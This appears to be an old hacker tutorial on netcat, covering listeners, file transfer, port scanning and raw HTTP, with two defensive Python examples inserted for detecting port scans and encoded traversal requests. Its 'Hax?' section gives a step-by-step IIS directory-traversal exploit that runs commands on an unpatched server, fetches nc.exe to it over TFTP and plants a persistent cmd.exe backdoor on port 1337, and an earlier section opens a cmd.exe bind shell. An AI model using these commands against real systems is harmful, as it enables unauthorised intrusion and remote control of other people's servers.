Petting Your Netcat

By intimidat0r
Introduction
They call it the TCP Swiss Army knife for a reason. Near the top of any
reputable security tool list, netcat appears to be timeless, and
eternally useful. It was coded for a more abstract purpose: to supply
users with a frontend for various networking tasks. It also boasts a
rather large learning curve. That's where I come in.

Basic Netcat Operation
Here's an example to kind of get you into the 'netcat mood'. Pop open
two shells. In the first shell, we will start netcat like this:

$nc -l -p 100

And in the second window:

$nc 127.0.0.1 100

Now, in the first one, we have supplied the -l flag. This tells netcat to
listen for incoming connections. We specify the port to listen on with
the -p flag, in this case port #100.

In the second window, we tell netcat to connect to the same machine,
using the loopback address 127.0.0.1, on port 100.

Now try typing in some random text in the second window. When you
hit enter, the data is sent to the instance of netcat listening on port
100, running in the first window, and that instance of netcat pipes it to
STDOUT (A.K.A. prints it on the screen). (You can also do the same
with the first window, and it will appear in the second).

Let's set up a very primitive FTP server on our machine via netcat. This
is really just a very poor way to transfer a file from one host to
another. Open up two windows. In the first:

$nc -l -p 21 > a.txt

And in the second window:

$cat b.txt | nc 127.0.0.1 21

We print the contents of b.txt and pipe it to netcat, which transfers it
to the other instance of netcat. This instance is told to redirect (via >)
any input to the file specified, a.txt.

While on the topic of creating cheap knockoffs of popular daemons,
let's create a bad telnet-type server for Windows XP, since these are
incredibly hard to find (and even harder for me to pay for. Ugh.)

We can start our "telnet server" on a machine, 192.168.0.100:

C:\WINDOWS> nc -l -p 1337 -e cmd.exe

You are familiar with -l and -p (notice our choice of port!) but what is
with -e? Well, -e specifies what program to run for the user after they
connect. In this case, cmd.exe so we get an elite command line. Now,
we can connect to the machine using the 'telnet' program built into
Windows XP (the client host this time):

C:\WINDOWS> telnet 192.168.0.100 1337


Port-Scanning with Netcat
Nmap is a thing of the past. Well not really, but you'll feel so much
cooler using netcat to do your port scanning from now on. Quite
simple too:

$nc -w 1 -z 127.0.0.1 10-50

This will try to connect to each port on your computer from 10 to 50.
The -w flag is supplied to specify the timeout for the connection, in
seconds. It's one second, in case you couldn't figure that one out.

The -z flag is used for "zero I/O" mode. Netcat's manpage
recommends that this be supplied if you're scanning.
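
How a scan like the one above looks from the receiving side, as an added example that is not part of the original article: it flags any source that touches many distinct ports inside a short window. The log layout, the addresses and both thresholds are assumptions made for this sketch.

```python
# Added example: spot one source probing many ports in a short time,
# which is the footprint left by "nc -w 1 -z <host> 10-50".
from collections import defaultdict, deque

WINDOW_SECONDS = 60       # assumption: look-back window
DISTINCT_PORT_LIMIT = 20  # assumption: distinct ports tolerated per source


def build_sample():
    """Constructed log, one attempt per line: 'epoch_seconds source_ip dest_port'."""
    # 41 probes, ports 10-50, one per second (the -w 1 worst case).
    lines = [f"{1000 + i} 192.0.2.50 {port}"
             for i, port in enumerate(range(10, 51))]
    # An ordinary client that only talks to two services.
    lines += ["1005 192.0.2.7 80", "1010 192.0.2.7 443", "1020 192.0.2.7 80"]
    return sorted(lines, key=lambda line: int(line.split()[0]))


def find_scanners(lines, window=WINDOW_SECONDS, limit=DISTINCT_PORT_LIMIT):
    """Return {source_ip: most distinct ports seen in one window} for offenders."""
    recent = defaultdict(deque)  # source -> (timestamp, port) pairs in window
    offenders = {}
    for line in lines:
        ts_text, source, port_text = line.split()
        ts, port = int(ts_text), int(port_text)
        attempts = recent[source]
        attempts.append((ts, port))
        # Drop attempts that have aged out of the window.
        while ts - attempts[0][0] > window:
            attempts.popleft()
        distinct = len({p for _, p in attempts})
        if distinct > limit:
            offenders[source] = max(offenders.get(source, 0), distinct)
    return offenders


if __name__ == "__main__":
    for source, ports in find_scanners(build_sample()).items():
        print(f"{source} probed {ports} distinct ports within {WINDOW_SECONDS}s")
```

A scan paced more slowly than the window slips under a counter like this, so the window and limit need tuning against real traffic.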

Browsing the Web with Netcat
You can use netcat in case for some reason you are lacking your
browser, feel like reading raw HTML code, want to look cool, or some
combination of the three. How?

echo -e "GET / HTTP/1.0\n\n" | nc -w 5 www.google.com 80

Netcat connects to google.com on port 80 (timeout of 5 seconds) and
then bash pipes that HTTP GET request string to it. This will return the
HTML code for the page located at www.google.com. Not quite sure
why you would want this, but oh well.

Hax?
Since you asked, I'm going to show you a simple type of IIS exploit
that is used in many netcat seminars, if there is such a thing. This was
patched like two years ago, but it's lots of fun nonetheless.

First up, start netcat:

$nc -v -n 70.69.68.67 80

Where of course the IP address is the IIS Server's IP and 80 is the
standard port for TCP/HTTP. The -v option makes it more verbose
(more output w00t) and -n means that we are giving it a numeric IP
address only, as opposed to a domain or something.

Now once it connects, type this and hit enter:

GET
http://70.69.68.67/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

This will get a standard HTTP banner. But wait! It also does a 'dir c:\',
which lists the contents of C:\, Windows' version of /.

Now let's upload netcat to their pathetic unpatched asses. Or if you're
not a big binary-fetish man, we can just use their server instead.

$nc -v -n 70.69.68.67 80
GET
http://70.69.68.67/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-
i+70.69.68.67+GET+nc.exe

Now let's use netcat to create a backdoor. Remember our pseudo-
telnet server? We want to run this on the netcat on their server.

nc -L -p 1337 -d -e cmd.exe

-L (not -l, -L) tells netcat to wait for connections without closing. -d
tells it to detach (d for detach) from the process we want it to run.

If we convert that command to a unicode URL it looks like this:
http:///c+nc+-L+-p+1337+-e+cmd.exe

Run that on their machine the same way you ran everything else - by
appending it to the end of the cmd.exe?/ thing. If you can't figure that
out...you'd better reread this.

There's really a load of stuff you can do to mess with them. Transfer a
file to their computer? Figure that one out, you can put it together
from previous usage examples in this article.
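
Why the ..%255c.. request works, and how to catch it in web logs, as an added example that is not part of the original article: %25 decodes to %, so one decoding pass leaves %5c and a second pass turns that into a backslash. The log layout and client addresses below are constructed for this sketch; only the request path comes from the text above.

```python
# Added example: flag request paths that hide a directory traversal
# behind more than one layer of percent-encoding.
from urllib.parse import unquote

MAX_ROUNDS = 5  # assumption: stop decoding after this many passes

# Constructed sample lines; simplified layout assumed for this example:
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = [
    r"2001-05-20 10:14:55 192.0.2.7 GET /index.html - 200",
    r"2001-05-20 10:15:02 192.0.2.10 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\ 200",
    r"2001-05-20 10:15:40 192.0.2.7 GET /docs/annual%20report.htm - 200",
]


def canonicalize(path):
    """Percent-decode until the text stops changing; return (text, passes)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def inspect(uri_stem):
    """Return the reasons a request path looks like an encoded traversal."""
    canon, rounds = canonicalize(uri_stem)
    reasons = []
    if rounds > 1:
        reasons.append("multiply-encoded")
    # Windows accepts "\" as a path separator, so normalise it first.
    if ".." in canon.replace("\\", "/").split("/"):
        reasons.append("traversal")
    return reasons


def scan(lines):
    """Return (client_ip, uri_stem, reasons) for every flagged log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 7 and inspect(fields[4]):
            hits.append((fields[2], fields[4], inspect(fields[4])))
    return hits


if __name__ == "__main__":
    for client, stem, reasons in scan(SAMPLE_LOG):
        print(client, stem, ", ".join(reasons))
```

The same ordering matters on the server: a path check that runs before the final decoding pass sees %5c rather than a backslash, so validation belongs after the path is fully decoded.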

Conclusion
So now you know netcat is really much more useful than you thought,
eh? For further reading, I'd like to direct you to the following:

The netcat manpage

$man nc

The netcat readme file

http://www.vulnwatch.org/netcat/readme.html

Where do I get it?
For *nix:

http://freshmeat.net/redir/netcat/7041/url_tgz/nc110.tgz

For Windows:

http://www.vulnwatch.org/netcat/nc111nt.zip

				
posted:3/5/2010